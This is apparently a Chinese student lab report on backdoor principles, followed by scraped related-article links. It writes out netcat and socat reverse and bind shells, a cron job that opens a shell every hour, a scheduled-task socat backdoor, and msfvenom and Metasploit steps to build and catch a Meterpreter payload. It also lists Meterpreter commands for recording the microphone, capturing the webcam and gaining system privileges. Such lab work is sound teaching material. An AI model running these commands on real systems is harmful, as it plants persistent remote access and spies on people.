一,后门概念

后门就是不经过正常认证流程而访问系统的通道。

二,后门工具

1.netcat(nc、ncat)

  • 是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。

2.socat

  • 类似于Netcat的加强版。以上两个工具均可以在老师课件主页的附件中下载.

3.Meterpreter

  • 利用 Metaspolit 的 msfvenom 指令生成后门可执行文件,本实验要生成的这个后门程序就是Meterpreter。

    Windows获得Linux Shell

  • windows中ipconfig查看ip

  • 进入ncat.exe程序所在的路径,ncat.exe -l -p 5302

  • 在kali中,nc 192.168.33.1 5302 -e /bin/sh

  • Windows成功获得kali的shell

Linux获得Windows Shell

  • kali中ifconfig查看ip
  • nc -l -p 5302
  • 在windows中,ncat.exe -e cmd.exe 192.168.80.132 5302
  • 成功

    用nc传输数据

  • windows中ncat.exe -l 5302
  • kali中,nc 192.168.33.1 5302
  • 连接成功

三,实验步骤

  • windows中监听5302端口,ncat.exe -l -p 5302
  • kali中crontab指令增加一条定时任务,"-e"表示编辑。因为是第一次编辑,故提示选择编辑器,我选择了3,并添加了最后一行
  • 56 * * * * /bin/netcat 192.168.33.1 5302 -e /bin/sh,就是在每个小时的第56分钟执行后面的那条指令

  • 到时间后可以使用ls指令

    socat 定时启动

  • 打开“计算机管理”
  • “任务计划程序”------“创建任务”
  • 操作--添加脚本(socat.exe的路径)---添加参数(tcp-listen:5302 exec:cmd.exe,pty,stderr)

  • kali中输入socat - tcp:192.168.33.1:5302

体验 MSF Meterpreter 功能

  • 在kali上,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.132 LPORT=5302 -f exe > 20165302_backdoor.exe,此条指令意为生成一个.exe程序,将来在windows上运行时会回连到Linux主机相应端口

  • 在Windows下执行ncat.exe -l 5302 > 20165302_backdoor.exe
  • 在Linux中执行nc 192.168.33.1 5302 < 20165302_backdoor.exe
  • 在Kali上使用msfconsole指令进入msf控制台
  • 输入use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.80.132
  • set LPORT 5302

  • exploit
  • windows运行20165302_backdoor.exe

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

  • record_mic进行录音

  • webcam_snap使用摄像头

  • 输入指令screenshot 截取屏幕
  • 输入指令getuid 查看当前用户,输入指令getsystem 提权

    回答问题

    1.例举你能想到的一个后门进入到你系统中的可能方式?

用户在下载软件时,软件绑定了后门

2.例举你知道的后门如何启动起来(win及linux)的方式?

win中的后门可能伴随可执行文件一同启动
Linux通过cron启动
3.Meterpreter有哪些给你映像深刻的功能?

窃取摄像机,录像,录音
记录键盘击键顺序

4.如何发现自己有系统有没有被安装后门?

通过杀毒软件进行监控

20165302 程上杰 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  2. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  5. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  6. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  7. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  8. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  9. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

随机推荐

  1. 撩课-Web大前端每天5道面试题-Day28

    1.用setTimeout()方法来模拟setInterval()与setInterval()之间的什么区别? 首先来看setInterval的缺陷,使用setInterval()创建的定时器确保了定 ...

  2. SpringMVC拦截器和@ResponseBody注解冲突

    在使用@ResponseBody注解后controller方法只会返回ModelandView对象的数据模型,不会返回视图,这样有很多好处,但是如果在拦截器中进行了页面转发,在满足页面转发条件时,不会 ...

  3. Jquery动态设置下拉框selected --(2018 08/12-08/26周总结)

    1.Jquery动态根据内容设置下拉框selected 需求就是根据下拉框的值动态的设置为selected,本以为很简单,网上一大推的方法,挨着尝试了之后却发现没有一个是有用的.网上的做法如下: &l ...

  4. 伯克利开源 Confluo,吞吐量是 Kafka 的 4 到 10 倍

    近日伯克利 RISE Lab 开源了一个多数据流实时分布式分析系统 Confluo,它既是一个网络监控和诊断框架,也可以作为时序数据库和发布订阅消息系统. 源码地址:https://github.co ...

  5. 100行代码实现现代版Router

      原文:http://www.html-js.com/article/JavaScript-version-100-lines-of-code-to-achieve-a-modern-version ...

  6. apicloud 自定义模块的开发与上架注意事项

    模块开发要点与返回刷新页面注意事项 1.介绍 apicloud 除了使用官方提供的模块外,我们可以自定义一些模块供自己使用和上传到官方出售.针对没有提供或者价格过贵的模块,如果有时间自己可以进行研究. ...

  7. python网络爬虫抓取动态网页并将数据存入数据库MySQL

    简述以下的代码是使用python实现的网络爬虫,抓取动态网页 http://hb.qq.com/baoliao/ .此网页中的最新.精华下面的内容是由JavaScript动态生成的.审查网页元素与网页 ...

  8. 【代码笔记】iOS-将字符串中特定后的字变成红色

    一,效果图. 二,代码. ViewController.m - (void)viewDidLoad { [super viewDidLoad]; // Do any additional setup ...

  9. OSGI企业应用开发(七)细说Blueprint & Gemini Blueprint(二)

    上篇文章介绍了标准的Blueprint 规范与 Gemini Blueprint如何自定义Bean配置文件路径,本文接着上篇文章继续介绍Blueprint的使用. 一.Bean的配置 前面提到过,Ge ...

  10. ArcGIS 中取出面上最大的Z值的坐标点

    def MaxZ(shape):        line = shape.getPart(0)     pnt = line.next()     maxValue = float("-in ...